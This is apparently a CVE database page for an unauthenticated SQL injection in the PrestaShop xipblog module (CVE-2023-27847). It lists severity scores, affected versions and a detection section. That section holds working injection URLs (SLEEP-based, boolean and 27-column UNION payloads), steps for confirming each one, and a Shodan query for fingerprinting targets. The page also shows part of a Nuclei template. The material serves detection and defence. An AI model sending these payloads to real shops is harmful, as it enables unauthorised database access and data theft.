CVE-2023-27847
published 2023-03-27CVE-2023-27847: SQL injection vulnerability found in PrestaShop xipblog v.2.0.1 and before allow a remote attacker to gain privileges via the xipcategoryclass and…
PriorityP268critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
4.71%
90.7th percentile
SQL injection vulnerability found in PrestaShop xipblog v.2.0.1 and before allow a remote attacker to gain privileges via the xipcategoryclass and xippostsclass components.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xipblog_project | xipblog | <= 2.0.1 | — |
Detection & IOCsextracted from sources · hover to see the quote
url/module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(5)))AuDU)--+lafl
url/module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+5484=5484--+xhCs
url/module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+5484=5485--+xhCs
url/module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999)),NULL,NULL--+-
path/module/xipblog/archive
othershodan: html:"/xipblog"
- →Time-based blind SQLi: inject SLEEP(5) payload into the `subpage_type` parameter of /module/xipblog/archive and check for response duration >= 5 seconds with HTTP status != 404.
- →Boolean-based blind SQLi confirmation: a true condition (5484=5484) returns body containing `kr_blog_post_area`; a false condition (5484=5485) does not — use this differential to confirm injection.
- →Union-based SQLi: a 26-column UNION SELECT with CONCAT(md5(...)) in column 27 confirms data exfiltration when the md5 hash appears in the response body.
- →Vulnerable endpoint is accessible by anonymous (unauthenticated) users; no authentication is required to exploit the injection in the `subpage_type` GET parameter. ↗
- →Presence of the string `xipblog` in page body (e.g. via Shodan `html:"/xipblog"`) can be used to fingerprint potentially vulnerable PrestaShop instances before probing.
- →Vulnerable components are `xipcategoryclass` and `xippostsclass` within the xipblog PrestaShop module; monitor SQL query logs for anomalous queries originating from these class contexts. ↗
- ·The patched version still carries the version number 2.0.1 — version-based detection alone cannot distinguish vulnerable from patched installations; behavioral/code-level checks are required. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
PrestaShop xipblog - SQL Injection
nuclei·CVSS 9.8
CVE-2023-27847 [CRITICAL] PrestaShop xipblog - SQL Injection
PrestaShop xipblog - SQL Injection
In the blog module (xipblog), an anonymous user can perform SQL injection. Even though the module has been patched in version 2.0.1, the version number was not incremented at the time.
Template:
id: CVE-2023-27847
info:
name: PrestaShop xipblog - SQL Injection
author: mastercho
severity: critical
description: |
In the blog module (xipblog), an anonymous user can perform SQL injection. Even though the module has been patched in version 2.0.1, the version number was not incremented at the time.
remediation: |
Apply the latest security patches and updates from the vendor to address this vulnerability.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized acces
No writeups or analysis indexed.
2023-03-27
Published